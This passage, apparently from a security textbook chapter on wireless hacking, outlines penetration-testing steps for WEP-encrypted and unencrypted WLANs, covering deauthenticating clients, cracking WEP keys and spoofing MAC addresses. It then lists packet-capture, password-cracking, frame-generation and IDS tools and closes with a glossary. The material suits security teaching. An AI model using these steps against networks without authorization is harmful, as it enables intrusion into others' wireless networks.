WEP encrypted WLAN includes the following steps: 1. Check if the SSID is visible or hidden. 2. Sniff the traffic and check the status of packet capturing if SSID is visible. 3. If the packets are captured/injected, use tools such as Aircrack-ng, Airsnort, WEPcrack, etc. to break the WEP key or else sniff the traffic again. 4. If SSID is hidden, take the following steps: 1. Use tools such as Airplay-ng, Commview, Void11, etc. to deauthenticate the client. 2. Associate the client. 3. Follow the procedure of visible SSID. Pen testing unencrypted WLAN Pen testing unencrypted WLAN includes the following steps: 1. Check if the SSID is visible or hidden. 2. Sniff for IP range and check the status of MAC filtering if SSID is visible. 3. If MAC filtering is enabled, use tools such as SMAC to spoof valid MAC or use IP within the discovered range to connect to the AP. 4. If SSID is hidden, use tools such as Airplay-ng to discover the SSID and follow the procedure of visible SSID. Capture a wireless network's packets An attacker captures the packets from a wireless network and analyzes those packets to perform attacks. The following tools are used to capture a wireless network's packets: Airopeek Airtraf Apsniff Cain Wireshark WEP/WPA password attacking tools used in wireless penetration The WEP/WPA password attacking tools used in the wireless penetration testing steps are as follows: Aircrack-ptw Aircrack-ng Aircrack Airsnort coWPAtty wep attack wep crack Airbase Frame generation software used in wireless penetration The various frame generation software used in wireless penetration are as follows: Airgobbler airpwn Airsnarf Commview fake ap void 11 wifi tap IDS tools used in wireless penetration The IDS tools used in wireless penetration are as follows: WIDZ War Scanner Snort-Wireless AirDefense AirMagnet Chapter Summary In this chapter, we learned about wireless networks, various types of wireless networks, Wi-Fi authentication modes, and types of wireless encryption. This chapter focused on wireless hacking methodology, Bluetooth hacking, and Wireless penetration testing. Glossary Ad hoc Ad hoc is a basic topology of a wireless network. An ad hoc network consists of two or more wireless devices that communicate directly with each other. Infrastructure network An infrastructure network consists of an access point that connects wireless devices to the standard cable network. MAC filtering MAC filtering is a security access control technique that allows specific network devices to access or prevent them from accessing the network. Service Set Identifier Service Set Identifier is used to identify a wireless network. SSIDs are case sensitive text strings and have a maximum length of 32 characters. Warchalking Warchalking is the drawing of symbols in public places to advertise an open Wi-Fi wireless network. Wardriving Wardriving is a technique used to locate insecure wireless networks while driving around. Warwalking Warwalking is the act of walking around with a Wi-Fi enabled laptop to get an access point for a wireless network. Wireless intrusion prevention system Wireless intrusion prevention system (WIPS) monitors the radio spectrum for the presence of unauthorized, rogue access points and the use of wireless attack tools. Wireless network A wireless network refers to any type of computer network that is wireless, and is commonly associated with a telecommunications network whose interconnections between nodes are implemented without the use of wires. WMAN WMAN represents a wireless network that connects two or more wireless LANs in the same geographical area. WPAN WPAN is a wireless personal area network that interconnects devices centered on an individual person's workspace.